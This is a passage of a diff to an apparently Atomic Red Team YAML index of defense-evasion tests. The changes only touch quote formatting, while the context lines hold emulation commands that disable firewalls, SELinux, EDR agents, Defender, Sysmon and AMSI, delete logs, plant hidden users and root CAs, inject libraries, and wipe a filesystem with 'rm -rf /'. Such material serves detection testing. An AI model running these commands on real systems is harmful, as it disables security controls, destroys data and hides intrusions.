- description: 'Check if ufw is installed on the machine.
-'
+ '
prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n*****
ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep
-q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1;
fi \n"
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
command: 'ufw disable
-'
+ '
cleanup_command: |
ufw enable
ufw status verbose
@@ -26360,7 +26360,7 @@ defense-evasion:
dependencies:
- description: 'Check if systemctl and ufw is installed on the machine.
-'
+ '
prereq_command: "if [ ! -x \"$(command -v systemctl)\" ]; then echo -e \"\\n*****
systemctl NOT installed *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v
ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1;
@@ -26368,13 +26368,13 @@ defense-evasion:
ufw inactive *****\\n\"; exit 1; fi \n"
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
command: 'systemctl stop ufw
-'
+ '
cleanup_command: |
systemctl start ufw
systemctl status ufw
@@ -26387,20 +26387,20 @@ defense-evasion:
dependencies:
- description: 'Check if ufw is installed on the machine and enabled.
-'
+ '
prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n*****
ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep
-q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1;
fi \n"
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
command: 'ufw logging off
-'
+ '
cleanup_command: |
ufw logging low
ufw status verbose
@@ -26414,14 +26414,14 @@ defense-evasion:
dependencies:
- description: 'Check if ufw is installed on the machine and enabled.
-'
+ '
prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n*****
ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep
-q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1;
fi \n"
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
@@ -26435,21 +26435,21 @@ defense-evasion:
auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c
description: 'Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules.
-'
+ '
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if /etc/ufw/user.rules exists.
-'
+ '
prereq_command: 'if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n*****
ufw NOT installed *****\n"; exit 1; fi
-'
+ '
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
@@ -26458,7 +26458,7 @@ defense-evasion:
grep "# THIS IS A COMMENT" /etc/ufw/user.rules
cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/ufw/user.rules
-'
+ '
- name: Edit UFW firewall ufw.conf file
auto_generated_guid: c1d8c4eb-88da-4927-ae97-c7c25893803b
description: "Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf
@@ -26469,14 +26469,14 @@ defense-evasion:
dependencies:
- description: 'Check if /etc/ufw/ufw.conf exists.
-'
+ '
prereq_command: 'if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw
NOT installed *****\n"; exit 1; fi
-'
+ '
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
@@ -26496,14 +26496,14 @@ defense-evasion:
dependencies:
- description: 'Check if /etc/ufw/sysctl.conf exists.
-'
+ '
prereq_command: 'if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n*****
ufw NOT installed *****\n"; exit 1; fi
-'
+ '
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
@@ -26523,14 +26523,14 @@ defense-evasion:
dependencies:
- description: 'Check if /etc/default/ufw exists.
-'
+ '
prereq_command: 'if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw
NOT installed *****\n"; exit 1; fi
-'
+ '
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
@@ -26539,7 +26539,7 @@ defense-evasion:
grep "# THIS IS A COMMENT" /etc/default/ufw
cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/default/ufw
-'
+ '
- name: Tail the UFW firewall log file
auto_generated_guid: 419cca0c-fa52-4572-b0d7-bc7c6f388a27
description: "Print the last 10 lines of the Uncomplicated Firewall (UFW) log
@@ -26550,20 +26550,20 @@ defense-evasion:
dependencies:
- description: 'Check if /var/log/ufw.log exists.
-'
+ '
prereq_command: 'if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw
NOT logging *****\n"; exit 1; fi
-'
+ '
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
command: 'tail /var/log/ufw.log
-'
+ '
cleanup_command: ''
T1562.001:
technique:
@@ -26637,7 +26637,7 @@ defense-evasion:
auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8
description: 'Disables syslog collection
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -26666,11 +26666,11 @@ defense-evasion:
dependencies:
- description: 'Package with rsyslog must be on system
-'
+ '
prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit
1; fi
-'
+ '
get_prereq_command: "sudo #{package_installer} \n"
executor:
command: "#{flavor_command}\n"
@@ -26681,7 +26681,7 @@ defense-evasion:
auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8
description: 'Disable the Cb Response service
-'
+ '
supported_platforms:
- linux
executor:
@@ -26699,23 +26699,23 @@ defense-evasion:
auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8
description: 'Disables SELinux enforcement
-'
+ '
supported_platforms:
- linux
executor:
command: 'setenforce 0
-'
+ '
cleanup_command: 'setenforce 1
-'
+ '
name: sh
elevation_required: true
- name: Stop Crowdstrike Falcon on Linux
auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d
description: 'Stop and disable Crowdstrike Falcon on Linux
-'
+ '
supported_platforms:
- linux
executor:
@@ -26731,7 +26731,7 @@ defense-evasion:
auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c
description: 'Disables Carbon Black Response
-'
+ '
supported_platforms:
- macos
executor:
@@ -26747,48 +26747,48 @@ defense-evasion:
auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3
description: 'Disables LittleSnitch
-'
+ '
supported_platforms:
- macos
executor:
command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
-'
+ '
cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
-'
+ '
name: sh
elevation_required: true
- name: Disable OpenDNS Umbrella
auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849
description: 'Disables OpenDNS Umbrella
-'
+ '
supported_platforms:
- macos
executor:
command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
-'
+ '
cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
-'
+ '
name: sh
elevation_required: true
- name: Disable macOS Gatekeeper
auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053
description: 'Disables macOS Gatekeeper
-'
+ '
supported_platforms:
- macos
executor:
command: 'sudo spctl --master-disable
-'
+ '
cleanup_command: 'sudo spctl --master-enable
-'
+ '
name: sh
elevation_required: true
- name: Stop and unload Crowdstrike Falcon on macOS
@@ -26796,7 +26796,7 @@ defense-evasion:
description: 'Stop and unload Crowdstrike Falcon daemons falcond and userdaemon
on macOS
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -26834,40 +26834,40 @@ defense-evasion:
dependencies:
- description: 'Sysmon must be downloaded
-'
+ '
prereq_command: 'if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon
2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else {
exit 1 }
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip"
Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force
Remove-Item $env:TEMP\Sysmon.zip -Force
- description: 'sysmon must be Installed
-'
+ '
prereq_command: 'if(sc.exe query sysmon | findstr sysmon) { exit 0 } else
{ exit 1 }
-'
+ '
get_prereq_command: |
if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
{ Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i}
- description: 'sysmon filter must be loaded
-'
+ '
prereq_command: 'if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0
} else { exit 1 }
-'
+ '
get_prereq_command: |
sysmon -u
sysmon -accepteula -i
executor:
command: 'fltmc.exe unload #{sysmon_driver}
-'
+ '
cleanup_command: |
sysmon -u -i > nul 2>&1
sysmon -i -accepteula -i > nul 2>&1
@@ -26879,7 +26879,7 @@ defense-evasion:
auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc
description: 'Uninstall Sysinternals Sysmon for Defense Evasion
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -26892,10 +26892,10 @@ defense-evasion:
dependencies:
- description: 'Sysmon executable must be available
-'
+ '
prereq_command: 'if(cmd /c where sysmon) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
@@ -26904,20 +26904,20 @@ defense-evasion:
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
- description: 'Sysmon must be installed
-'
+ '
prereq_command: 'if(cmd /c sc query sysmon) { exit 0} else { exit 1}
-'
+ '
get_prereq_command: 'cmd /c sysmon -i -accepteula
-'
+ '
executor:
command: 'sysmon -u
-'
+ '
cleanup_command: 'sysmon -i -accepteula >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: AMSI Bypass - AMSI InitFailed
@@ -26945,11 +26945,11 @@ defense-evasion:
command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}"
-Recurse
-'
+ '
cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers"
-Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
-'
+ '
name: powershell
elevation_required: true
- name: Disable Arbitrary Security Windows Service
@@ -27023,11 +27023,11 @@ defense-evasion:
command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"
-Name DisableAntiSpyware -Value 1
-'
+ '
cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows
Defender" -Name DisableAntiSpyware -Value 0
-'
+ '
name: powershell
elevation_required: true
- name: Disable Microsoft Office Security Features
@@ -27067,7 +27067,7 @@ defense-evasion:
command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions
-All
-'
+ '
name: command_prompt
elevation_required: true
- name: Stop and Remove Arbitrary Security Windows Service
@@ -27077,7 +27077,7 @@ defense-evasion:
The Remove-Service cmdlet removes a Windows service in the registry and in
the service database.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -27098,7 +27098,7 @@ defense-evasion:
is located in a folder named with a random guid we need to identify it before
invoking the uninstaller.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -27185,7 +27185,7 @@ defense-evasion:
description: 'Using the Disable-AntiPhishRule cmdlet to disable antiphish rules
in your office-365 organization.
-'
+ '
supported_platforms:
- office-365
input_arguments:
@@ -27201,7 +27201,7 @@ defense-evasion:
dependencies:
- description: 'ExchangeOnlineManagement PowerShell module must be installed
-'
+ '
prereq_command: |
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
@@ -27265,17 +27265,17 @@ defense-evasion:
prereq_command: 'if (Test-Path #{DefenderControlExe}) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: |
Start-BitsTransfer -Source "https://web.archive.org/web/20201210152711/https://www.sordum.org/files/download/defender-control/DefenderControl.zip" -Destination "$env:temp\defendercontrol.zip" -dynamic
expand-archive -LiteralPath "$env:temp\defendercontrol.zip" -DestinationPath "$env:temp\DefenderControl"
executor:
command: 'cmd /c #{DefenderControlExe} /D #{DefenderID} | Out-Null
-'
+ '
cleanup_command: 'cmd /c #{DefenderControlExe} /E | Out-Null
-'
+ '
name: powershell
elevation_required: true
- name: Disable Defender Using NirSoft AdvancedRun
@@ -27300,11 +27300,11 @@ defense-evasion:
dependencies:
- description: 'Advancedrun.exe must exist at #{AdvancedRun_Location}
-'
+ '
prereq_command: 'if(Test-Path -Path #{AdvancedRun_Location}) {exit 0} else
{exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "$env:temp\advancedrun.zip"
Expand-Archive -path "$env:temp\advancedrun.zip" -destinationpath "$env:temp\" -Force
@@ -27319,7 +27319,7 @@ defense-evasion:
/WindowState 0 /CommandLine "start WinDefend" /StartDirectory "" /RunAs
8 /Run} Catch{}
-'
+ '
name: powershell
elevation_required: true
T1078.002:
@@ -27659,13 +27659,13 @@ defense-evasion:
Provider to be federated must be configured (outside of the scope of this
test).
-'
+ '
prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AzureADPreview -Force
-'
+ '
executor:
command: |
Import-Module AzureADPreview
@@ -28093,21 +28093,21 @@ defense-evasion:
- description: 'The shared library must exist on disk at specified location
(#{path_to_shared_library})
-'
+ '
prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
-'
+ '
executor:
command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload''
-'
+ '
cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload
-'
+ '
name: bash
elevation_required: true
- name: Shared Library Injection via LD_PRELOAD
@@ -28132,18 +28132,18 @@ defense-evasion:
- description: 'The shared library must exist on disk at specified location
(#{path_to_shared_library})
-'
+ '
prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
-'
+ '
executor:
command: 'LD_PRELOAD=#{path_to_shared_library} ls
-'
+ '
name: bash
T1055.001:
technique:
@@ -28244,10 +28244,10 @@ defense-evasion:
dependencies:
- description: 'Utility to inject must exist on disk at specified location (#{dll_payload})
-'
+ '
prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}"
@@ -28787,7 +28787,7 @@ defense-evasion:
auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480
description: 'Delete a single file from the temporary directory
-'
+ '
supported_platforms:
- linux
- macos
@@ -28799,14 +28799,14 @@ defense-evasion:
executor:
command: 'rm -f #{file_to_delete}
-'
+ '
name: sh
- name: Delete an entire folder - Linux/macOS
auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e
description: 'Recursively delete the temporary directory and all files contained
within it
-'
+ '
supported_platforms:
- linux
- macos
@@ -28818,14 +28818,14 @@ defense-evasion:
executor:
command: 'rm -rf #{folder_to_delete}
-'
+ '
name: sh
- name: Overwrite and delete a file with shred
auto_generated_guid: '039b4b10-2900-404b-b67f-4b6d49aa6499'
description: 'Use the `shred` command to overwrite the temporary file and then
delete it
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -28836,7 +28836,7 @@ defense-evasion:
executor:
command: 'shred -u #{file_to_shred}
-'
+ '
name: sh
- name: Delete a single file - Windows cmd
auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3
@@ -28856,17 +28856,17 @@ defense-evasion:
- description: 'The file to delete must exist on disk at specified location
(#{file_to_delete})
-'
+ '
prereq_command: 'IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
-'
+ '
get_prereq_command: 'echo deleteme_T1551.004 >> #{file_to_delete}
-'
+ '
executor:
command: 'del /f #{file_to_delete}
-'
+ '
name: command_prompt
- name: Delete an entire folder - Windows cmd
auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698
@@ -28886,17 +28886,17 @@ defense-evasion:
- description: 'The file to delete must exist on disk at specified location
(#{folder_to_delete})
-'
+ '
prereq_command: 'IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
-'
+ '
get_prereq_command: 'mkdir #{folder_to_delete}
-'
+ '
executor:
command: 'rmdir /s /q #{folder_to_delete}
-'
+ '
name: command_prompt
- name: Delete a single file - Windows PowerShell
auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72
@@ -28904,7 +28904,7 @@ defense-evasion:
Upon execution, no output will be displayed. Use File Explorer to verify the
file was deleted.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -28918,17 +28918,17 @@ defense-evasion:
- description: 'The file to delete must exist on disk at specified location
(#{file_to_delete})
-'
+ '
prereq_command: 'if (Test-Path #{file_to_delete}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'New-Item -Path #{file_to_delete} | Out-Null
-'
+ '
executor:
command: 'Remove-Item -path #{file_to_delete}
-'
+ '
name: powershell
- name: Delete an entire folder - Windows PowerShell
auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1
@@ -28936,7 +28936,7 @@ defense-evasion:
Upon execution, no output will be displayed. Use File Explorer to verify the
folder was deleted.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -28950,18 +28950,18 @@ defense-evasion:
- description: 'The folder to delete must exist on disk at specified location
(#{folder_to_delete})
-'
+ '
prereq_command: 'if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'New-Item -Path #{folder_to_delete} -Type Directory |
Out-Null
-'
+ '
executor:
command: 'Remove-Item -Path #{folder_to_delete} -Recurse
-'
+ '
name: powershell
- name: Delete Filesystem - Linux
auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52
@@ -28969,13 +28969,13 @@ defense-evasion:
This technique was used by Amnesia IoT malware to avoid analysis. This test
is dangerous and destructive, do NOT use on production equipment.
-'
+ '
supported_platforms:
- linux
executor:
command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null
-'
+ '
name: bash
- name: Delete Prefetch File
auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb
@@ -28988,7 +28988,7 @@ defense-evasion:
command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem
-Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])
-'
+ '
name: powershell
elevation_required: true
- name: Delete TeamViewer Log Files
@@ -29012,18 +29012,18 @@ defense-evasion:
- description: 'The folder to delete must exist on disk at specified location
(#{teamviewer_log_file})
-'
+ '
prereq_command: 'if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: 'New-Item -Path #{teamviewer_log_file} | Out-Null
-'
+ '
executor:
command: 'Remove-Item #{teamviewer_log_file}
-'
+ '
name: powershell
T1222:
technique:
@@ -29179,7 +29179,7 @@ defense-evasion:
auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b
description: 'Gatekeeper Bypass via command line
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -29190,7 +29190,7 @@ defense-evasion:
executor:
command: 'sudo xattr -d com.apple.quarantine #{app_path}
-'
+ '
elevation_required: true
name: sh
T1484.001:
@@ -29479,7 +29479,7 @@ defense-evasion:
auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be
description: 'Creates a hidden file inside a hidden directory
-'
+ '
supported_platforms:
- linux
- macos
@@ -29489,20 +29489,20 @@ defense-evasion:
echo "T1564.001" > /var/tmp/.hidden-directory/.hidden-file
cleanup_command: 'rm -rf /var/tmp/.hidden-directory/
-'
+ '
name: sh
- name: Mac Hidden file
auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9
description: 'Hide a file on MacOS
-'
+ '
supported_platforms:
- macos
executor:
command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00
40 00 FF FF FF FF 00 00"
-'
+ '
name: sh
- name: Create Windows System File with Attrib
auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32
@@ -29520,20 +29520,20 @@ defense-evasion:
dependencies:
- description: 'The file must exist on disk at specified location (#{file_to_modify})
-'
+ '
prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
-'
+ '
get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify}
-'
+ '
executor:
command: 'attrib.exe +s #{file_to_modify}
-'
+ '
cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Create Windows Hidden File with Attrib
@@ -29552,27 +29552,27 @@ defense-evasion:
dependencies:
- description: 'The file must exist on disk at specified location (#{file_to_modify})
-'
+ '
prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
-'
+ '
get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify}
-'
+ '
executor:
command: 'attrib.exe +h #{file_to_modify}
-'
+ '
cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Hidden files
auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379
description: 'Requires Apple Dev Tools
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -29583,13 +29583,13 @@ defense-evasion:
executor:
command: 'setfile -a V #(unknown)
-'
+ '
name: sh
- name: Hide a Directory
auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3
description: 'Hide a directory on MacOS
-'
+ '
supported_platforms:
- macos
executor:
@@ -29598,22 +29598,22 @@ defense-evasion:
chflags hidden /var/tmp/T1564.001_mac.txt
cleanup_command: 'rm /var/tmp/T1564.001_mac.txt
-'
+ '
name: sh
- name: Show all hidden files
auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c
description: 'Show all hidden files on MacOS
-'
+ '
supported_platforms:
- macos
executor:
command: 'defaults write com.apple.finder AppleShowAllFiles YES
-'
+ '
cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO
-'
+ '
name: sh
- name: Hide Files Through Registry
auto_generated_guid: f650456b-bd49-4bc1-ae9d-271b5b9581e7
@@ -29696,7 +29696,7 @@ defense-evasion:
description: 'Add a hidden user on macOS using Unique ID < 500 (users with that
ID are hidden by default)
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -29707,17 +29707,17 @@ defense-evasion:
executor:
command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333
-'
+ '
cleanup_command: 'sudo dscl . -delete /Users/#{user_name}
-'
+ '
elevation_required: true
name: sh
- name: Create Hidden User using IsHidden option
auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31
description: 'Add a hidden user on macOS using IsHidden optoin
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -29728,10 +29728,10 @@ defense-evasion:
executor:
command: 'sudo dscl . -create /Users/#{user_name} IsHidden 1
-'
+ '
cleanup_command: 'sudo dscl . -delete /Users/#{user_name}
-'
+ '
elevation_required: true
name: sh
T1564.003:
@@ -29813,7 +29813,7 @@ defense-evasion:
executor:
command: 'Start-Process #{powershell_command}
-'
+ '
name: powershell
T1564:
technique:
@@ -29896,7 +29896,7 @@ defense-evasion:
dependencies:
- description: 'Microsoft Word must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "Word.Application" | Out-Null
@@ -29906,7 +29906,7 @@ defense-evasion:
get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
to meet this requirement"
-'
+ '
executor:
command: |
$macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
@@ -29916,7 +29916,7 @@ defense-evasion:
Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore
-'
+ '
name: powershell
- name: Create a Hidden User Called "$"
auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778
@@ -30091,7 +30091,7 @@ defense-evasion:
auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5
description: 'Disables history collection in shells
-'
+ '
supported_platforms:
- linux
- macos
@@ -30259,7 +30259,7 @@ defense-evasion:
auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3
description: 'Emulates modification of auditd configuration files
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -30294,7 +30294,7 @@ defense-evasion:
auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
description: 'Emulates modification of syslog configuration.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -30439,10 +30439,10 @@ defense-evasion:
executor:
command: 'fsutil usn deletejournal /D C:
-'
+ '
cleanup_command: 'fsutil usn createjournal m=1000 a=100 c:
-'
+ '
name: command_prompt
elevation_required: true
T1202:
@@ -30538,7 +30538,7 @@ defense-evasion:
executor:
command: 'forfiles /p c:\windows\system32 /m notepad.exe /c #{process}
-'
+ '
name: command_prompt
- name: Indirect Command Execution - conhost.exe
auto_generated_guid: cf3391e0-b482-4b02-87fc-ca8362269b29
@@ -30556,7 +30556,7 @@ defense-evasion:
executor:
command: 'conhost.exe "#{process}"
-'
+ '
name: command_prompt
T1553.004:
technique:
@@ -30656,7 +30656,7 @@ defense-evasion:
auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e
description: 'Creates a root CA with openssl
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -30683,7 +30683,7 @@ defense-evasion:
auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff
description: 'Creates a root CA with openssl
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -30699,10 +30699,10 @@ defense-evasion:
dependencies:
- description: 'Verify the certificate exists. It generates if not on disk.
-'
+ '
prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: |
if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
@@ -30716,7 +30716,7 @@ defense-evasion:
auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49
description: 'Creates a root CA with openssl
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -30732,10 +30732,10 @@ defense-evasion:
dependencies:
- description: 'Verify the certificate exists. It generates if not on disk.
-'
+ '
prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: |
if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
@@ -30743,14 +30743,14 @@ defense-evasion:
command: 'sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain"
"#{cert_filename}"
-'
+ '
name: sh
elevation_required: true
- name: Install root CA on Windows
auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1
description: 'Creates a root CA with Powershell
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -30762,10 +30762,10 @@ defense-evasion:
dependencies:
- description: 'Verify the certificate exists. It generates if not on disk.
-'
+ '
prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
-'
+ '
get_prereq_command: |
$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
@@ -30787,7 +30787,7 @@ defense-evasion:
auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f
description: 'Creates a root CA with certutil
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -30799,10 +30799,10 @@ defense-evasion:
dependencies:
- description: 'Certificate must exist at specified location (#{pfx_path})
-'
+ '
prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
-'
+ '
get_prereq_command: |
$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
@@ -30810,7 +30810,7 @@ defense-evasion:
executor:
command: 'certutil -addstore my #{pfx_path}
-'
+ '
cleanup_command: |
try {
